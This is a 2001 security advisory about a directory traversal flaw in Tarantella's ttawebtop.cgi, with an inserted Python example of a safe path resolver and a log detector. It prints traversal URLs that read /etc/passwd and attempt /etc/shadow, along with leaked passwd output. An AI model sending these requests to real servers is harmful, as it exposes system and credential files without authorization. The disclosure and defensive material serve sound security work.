SecurityTracker.com
Category:   Application (Web Server/CGI)  >   Tarantella
Vendors:   Tarantella, Inc.
Tarantella Application Web Server Discloses Files on the Server to Remote Users
SecurityTracker Alert ID:  1001779
SecurityTracker URL:  http://securitytracker.com/id/1001779
CVE Reference:   GENERIC-MAP-NOMATCH
Date:  Jun 19 2001
Impact:   Disclosure of system information, Disclosure of user information
Exploit Included:  Yes

Description:   A vulnerability has been reported in the Tarantella application server that lets remote users obtain files located anywhere on the server.

The vulnerability reportedly resides in the ttawebtop.cgi module.

If a remote user requests a URL of the following form, the server will return the world-readable password file:

http://[targethost]/tarantella/cgi-bin/ttawebtop.cgi/?action=start&pg=../../../../../../../../../../../../../../../etc/passwd

If a remote user attempts to retrieve a file that is not readable by the web server, the server returns a 'File missing' error message, as shown below:

http://[targethost]/tarantella/cgi-bin/ttawebtop.cgi/?action=start&pg=../../../../../../../../../../../../../../../etc/shadow

File missing

The following file could not be found:

/tarantella/../../../../../../../../../../../../../../../etc/shadow

The vendor has reportedly been notified.

Impact:   A remote user can obtain world-readable files located anywhere on the server.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.tarantella.com/
Cause:   Access control error, Input validation error
Underlying OS:   Linux (Caldera/SCO), Linux (Red Hat Linux), Linux (SuSE), Linux (Turbo Linux), UNIX (AIX), UNIX (HP/UX), UNIX (Open UNIX-SCO), UNIX (Solaris - SunOS), UNIX (Tru64)
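As an added illustration (not code from the advisory or from Tarantella), the unsafe join that produces the behaviour described above is shown beside a contained resolver, together with a log check that flags ttawebtop.cgi requests whose pg value would escape the web root. DOC_ROOT and the access-log lines are constructed assumptions, since the page does not give the real web root path.

```python
import re
import posixpath
from urllib.parse import parse_qs, urlsplit

# Constructed document root; the real Tarantella web root is not given on the page.
DOC_ROOT = "/opt/tarantella/webtop"

def naive_resolve(doc_root, pg):
    """Mirrors the flaw in the advisory: pg is joined onto the web root with no
    containment check, so a run of '../' segments walks out to any file."""
    return posixpath.normpath(posixpath.join(doc_root, pg))

def safe_resolve(doc_root, pg):
    """Hardened variant. Expects pg already URL-decoded once (parse_qs does that)
    and deliberately does not decode again, which would re-open double-encoding.
    Returns the contained path, or None to be answered like a missing file."""
    if "\x00" in pg:
        return None
    root = posixpath.normpath(doc_root)
    candidate = posixpath.normpath(posixpath.join(root, pg.lstrip("/")))
    if candidate != root and not candidate.startswith(root + "/"):
        return None  # normalised path escaped the web root
    return candidate

# Combined-log request extraction; the sample lines are constructed for this example.
LOG_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/')
SAMPLE_LOG = [
    '10.0.0.5 - - [18/Jun/2001:13:06:41 -0400] "GET /tarantella/cgi-bin/ttawebtop.cgi/'
    '?action=start&pg=../../../../../../../../../../../../../../../etc/passwd HTTP/1.0" 200 1023',
    '10.0.0.5 - - [18/Jun/2001:13:07:02 -0400] "GET /tarantella/cgi-bin/ttawebtop.cgi/'
    '?action=start&pg=%2e%2e/%2e%2e/etc/shadow HTTP/1.0" 200 412',
    '10.0.0.7 - - [18/Jun/2001:13:08:15 -0400] "GET /tarantella/cgi-bin/ttawebtop.cgi/'
    '?action=start&pg=login.html HTTP/1.0" 200 5120',
]

def traversal_hits(lines):
    """Return the log lines whose ttawebtop.cgi pg parameter would escape DOC_ROOT.
    Checking the decoded, normalised path catches encoded variants, not just '../'."""
    hits = []
    for line in lines:
        m = LOG_RE.search(line)
        if not m or "ttawebtop.cgi" not in m.group(1):
            continue
        pg = parse_qs(urlsplit(m.group(1)).query).get("pg", [None])[0]
        if pg is not None and safe_resolve(DOC_ROOT, pg) is None:
            hits.append(line)
    return hits

if __name__ == "__main__":
    for hit in traversal_hits(SAMPLE_LOG):
        print("traversal attempt:", hit.split('"')[1])
```

Note that the 'File missing' response quoted in the advisory echoes the resolved path, so a server-side fix should also avoid reflecting the attacker-controlled path in the error page.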

Message History:   This archive entry has one or more follow-up message(s) listed below.
(Vendor Has Fixed This Issue) Re: Tarantella Application Web Server Discloses Files on the Server to Remote Users   (Mike McEwen <mikemc@tarantella.com>)
The vendor announces that they have fixed the problem. The vendor reports on which versions were vulnerable.



 Source Message Contents

Date:  Mon, 18 Jun 2001 13:18:08 -0400
Subject:  SCO Tarantella Remote file read via ttawebtop.cgi


SCO has been notified of this issue. 


-------- Original Message --------
Subject: SCO Tarantella Remote file read via ttawebtop.cgi
Date: Mon, 18 Jun 2001 13:06:41 -0400
From: KF <dotslash@snosoft.com>
To: recon@snosoft.com


http://xxx/tarantella/cgi-bin/ttawebtop.cgi/?action=start&pg=../../../../../../../../../../../../../../../etc/passwd

root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:
daemon:x:2:2:daemon:/sbin:
adm:x:3:4:adm:/var/adm:
lp:x:4:7:lp:/var/spool/lpd:
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/
...


No perms to shadow... 

http://xxx/tarantella/cgi-bin/ttawebtop.cgi/?action=start&pg=../../../../../../../../../../../../../../../etc/shadow

File missing

The following file could not be found:

/tarantella/../../../../../../../../../../../../../../../etc/shadow

Please give this information to a Tarantella Administrator.

-KF


Copyright 2012, SecurityGlobal.net LLC